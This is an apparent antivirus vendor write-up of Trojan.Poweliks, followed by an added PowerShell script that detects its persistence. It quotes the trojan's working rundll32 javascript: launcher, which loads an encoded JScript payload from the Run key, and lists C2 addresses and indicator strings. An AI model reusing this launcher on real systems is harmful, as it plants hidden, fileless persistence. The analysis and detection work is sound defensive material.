
Trojan.Poweliks


First posted on 05 August 2014.
Source: Symantec

Aliases :

There are no other names known for Trojan.Poweliks.

Explanation :

The Trojan may be dropped by Trojan.Mdropper.

When the Trojan is executed, it creates the following registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"(default)" = "[ENCRYPTED JAVASCRIPT]"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NON-ASCII STRING]" = "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write(\"\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\software\\microsoft\\windows\\currentversion\\run\\\")+\"\74/script>\")"

The two entries work together: the value with the non-ASCII name is the launcher, and the encrypted JScript payload lives in the key's default value. At logon, rundll32.exe loads mshtml and calls RunHTMLApplication on the javascript: URL, which uses WScript.Shell.RegRead (the trailing backslash in the path selects the default value) to fetch the payload and write it into a jscript.encode script block. No file is written to disk for this stage; the value name is also not displayed correctly by regedit.

The Trojan then checks whether the compromised computer has Windows PowerShell and the .NET Framework installed. If not, it downloads the installers for these components from the official Microsoft website.

Next, the Trojan decrypts a PowerShell script from the encrypted JavaScript stored in the registry and runs it to execute a binary program. This program connects to the following remote locations:

178.89.159.34
178.89.159.35

The Trojan may then perform the following activities:

Receive commands from the remote attacker
Delete the binary program
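The following PowerShell script is an added example for checking a host for the persistence entries described above; it is not Symantec's code and not part of the original description. It enumerates every value under the current user's Run key through the .NET registry API (which returns raw value names, so an entry whose name is made of non-ASCII characters is still listed) and flags the default value, value names outside printable ASCII, and value data containing the strings from the rundll32 command line quoted above. The indicator strings are taken from that command line; the function and variable names are the example's own.

```powershell
# Added example (not from the original page): look for Poweliks-style
# persistence in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

$runKeyPath = 'Software\Microsoft\Windows\CurrentVersion\Run'

# Substrings taken from the launcher command line quoted in the description.
$indicators = @(
    'rundll32.exe javascript:',
    'mshtml,RunHTMLApplication',
    'jscript.encode',
    'RegRead('
)

function Get-SuspiciousRunValues {
    param([string]$SubKeyPath = $runKeyPath)

    # The .NET API is used instead of Get-ItemProperty so that value names
    # which are not printable ASCII come back unchanged.
    $key = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($SubKeyPath)
    if ($null -eq $key) { return @() }

    $findings = @()
    try {
        foreach ($name in $key.GetValueNames()) {
            # Read the raw data; do not expand %VARS% so the string is compared as stored.
            $data = [string]$key.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $displayName = if ($name -eq '') { '(default)' } else { $name }

            $reasons = @()
            # Poweliks keeps its encrypted JScript in the key's default value;
            # GetValueNames() only returns '' when the default value is set.
            if ($name -eq '') { $reasons += 'data stored in (default) value' }
            # A value name containing characters outside 0x20-0x7E.
            if ($name -match '[^\x20-\x7E]') { $reasons += 'non-ASCII value name' }
            foreach ($ioc in $indicators) {
                if ($data.IndexOf($ioc, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
                    $reasons += "data contains '$ioc'"
                }
            }

            if ($reasons.Count -gt 0) {
                $findings += [pscustomobject]@{
                    Name       = $displayName
                    NameBytes  = ([System.Text.Encoding]::Unicode.GetBytes($name) |
                                  ForEach-Object { $_.ToString('x2') }) -join ''
                    DataLength = $data.Length
                    Reasons    = ($reasons -join '; ')
                    DataStart  = if ($data.Length -gt 120) { $data.Substring(0, 120) + '...' } else { $data }
                }
            }
        }
    }
    finally {
        $key.Close()
    }
    return $findings
}

Get-SuspiciousRunValues | Format-List
```

Run it in the context of the user whose profile is being examined, since the key is under HKEY_CURRENT_USER. NameBytes prints the UTF-16 bytes of the value name so that a name regedit cannot display can still be recorded and compared across hosts. On a clean machine the Run key normally has no default value set and only printable value names, so any hit is worth examining; a hit on the indicator strings is a strong match for the launcher described above.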

Last update 05 August 2014
